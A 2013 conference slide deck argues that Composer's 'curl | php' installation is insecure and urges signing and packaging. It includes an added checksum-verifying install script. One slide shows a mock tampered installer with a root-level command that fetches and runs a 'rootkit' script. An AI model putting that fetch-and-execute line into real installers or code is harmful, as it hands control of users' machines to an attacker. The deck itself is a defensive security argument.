
Composer - russian roulette

Joshua Thijssen
March 26, 2013


  1. First things first:
     • I like composer.
     • It has changed PHP packaging for the better.
     • I use it on a daily basis.
     • But composer is doing it wrong...
  2. Installing composer
     $ curl -sS https://getcomposer.org/installer | php
     Taken straight from the manual: http://getcomposer.org/doc/00-intro.md
  3. https://getcomposer.org/installer (excerpt of the installer as fetched by the command above)

     #!/usr/bin/env php
     <?php
     /*
      * This file is part of Composer.
      *
      * (c) Nils Adermann <[email protected]>
      *     Jordi Boggiano <[email protected]>
      *
      * For the full copyright and license information, please view the LICENSE
      * file that was distributed with this source code.
      */

     process($argv);

     /**
      * processes the installer
      */
     function process($argv)
     {
         $check      = in_array('--check', $argv);
         $help       = in_array('--help', $argv);
         $force      = in_array('--force', $argv);
         $quiet      = in_array('--quiet', $argv);
         $installDir = false;

         foreach ($argv as $key => $val) {
             if (0 === strpos($val, '--install-dir')) {
                 if (13 === strlen($val) && isset($argv[$key+1])) {
                     $installDir = trim($argv[$key+1]);
                 } else {
                     $installDir = trim(substr($val, 14));
                 }
             }
         }

         if ($help) {
             displayHelp();
             exit(0);
         }
  4. https://getcomposer.org/installer (what a tampered installer could look like)

     #!/usr/bin/env php
     <?php
     /* Teh H4xx0rs 3v1l filez: */
     exec("sudo curl -sS rootkit-install.sh | sh");
     exec("sudo curl -sS orig-composer-stuff.sh | sh");
  5. No, you wouldn’t notice
     • Compromises aren’t as visible as this example.
     • You don’t check the SHA / MD5 sum of the downloaded installer.
     • If you wanted to check, check against what?
  6. The real problem
     • We download unknown software on our development platform, and often also on production servers.
     • We tend to do this with a privileged (root) account.
     • We don’t and cannot verify the integrity of this process.
  7. We can fix this
     • We do this all the time: signing.
     • We place trust in a certificate or key.
     • Everything that is signed with that certificate / key is automatically trusted.
     • “web of trust”
     • apt-get install, yum install
  8. We can fix this
     • Let’s add composer to a (known) repository (EPEL, dag.wieers, remi collet).
     • Get rid of the auto-update features of composer. They are useless and easy to compromise.
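     The deck asks "check against what?" and answers with signing and packaging. Until a package exists, the minimum replacement for "curl | php" is: download to disk, compare against a hash pinned from a channel other than the download itself, and only then execute. The script below is an added example, not part of the deck or of Composer; the interpreter, URL and the expected hash are arguments the caller supplies (the hash must come from an out-of-band source, so none is hard-coded here).

```shell
#!/bin/sh
# Added example: verify-then-run instead of pipe-to-interpreter.

# sum_of FILE: print the hex SHA-256 of FILE (falls back to shasum on systems without sha256sum).
sum_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_installer FILE EXPECTED_SHA256
# Returns 0 only when FILE exists and its SHA-256 equals EXPECTED_SHA256. Executes nothing.
verify_installer() {
    file=$1
    expected=$2
    [ -f "$file" ] || return 1
    actual=$(sum_of "$file")
    [ "$actual" = "$expected" ]
}

# install_verified URL EXPECTED_SHA256 INTERPRETER [ARGS...]
# Downloads URL to a temporary file, verifies it, and runs INTERPRETER on it with ARGS
# only on a match. A mismatch refuses to run and removes the download.
# Example (hash is a placeholder, obtain the real one out-of-band):
#   install_verified https://getcomposer.org/installer <pinned-sha256> php --install-dir=/usr/local/bin
install_verified() {
    url=$1
    expected=$2
    interp=$3
    shift 3
    tmp=$(mktemp) || return 1
    if ! curl -sS -o "$tmp" "$url"; then
        rm -f "$tmp"
        return 1
    fi
    if verify_installer "$tmp" "$expected"; then
        "$interp" "$tmp" "$@"
        rc=$?
    else
        echo "checksum mismatch for $url, refusing to run" >&2
        rc=1
    fi
    rm -f "$tmp"
    return $rc
}
```

     This only moves trust from the transport to the pinned value; a detached signature checked with the repository's key, as the following slides argue, is the stronger form of the same idea.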
  9. But when we fix composer... another problem...
     • Composer downloads unverified, unsigned packages, mostly from git.
     • How do we know for sure those are safe?
  10. "... You can have people who try to be malicious. They won't succeed. You need to know exactly 20 bytes, you need to know the 160-bit SHA-1 name of the top of your tree, and if you know that, you can trust your tree, all the way down, the whole history. You can have 10 years of history, you can have 100,000 files, you can have millions of revisions, and you can trust every single piece of it. ...."
      Google TechTalk: Linus on Git, http://www.youtube.com/watch?v=4XpnKHJAok8
  11. Please..
      • “<command> | sh” and “<command> | php” have effectively been eliminated in the sysadmin world after decades.
      • They are insecure and relinquish control to other, non-trusted parties.
      • We should not allow PHP developers to embrace the worst practices.
  12. Please..
      • There are better ways to install software. We should use them.
      • Signing is THE best way to securely verify the integrity of data. We should get used to it.
  13. Please..
      • We need to change composer and all other tools that use this approach to implement a correct signing mechanism.
      • It’s possible. We can sign composer, and we can sign git commits.
      • We should not allow unsigned commits / packages (at least not without an explicit --allow-unsigned-packages flag).
  14. Btw..
      • It’s not just composer, RVM does this just as badly: https://rvm.io/rvm/install/
      • Let’s stop stupidity and FIX THIS!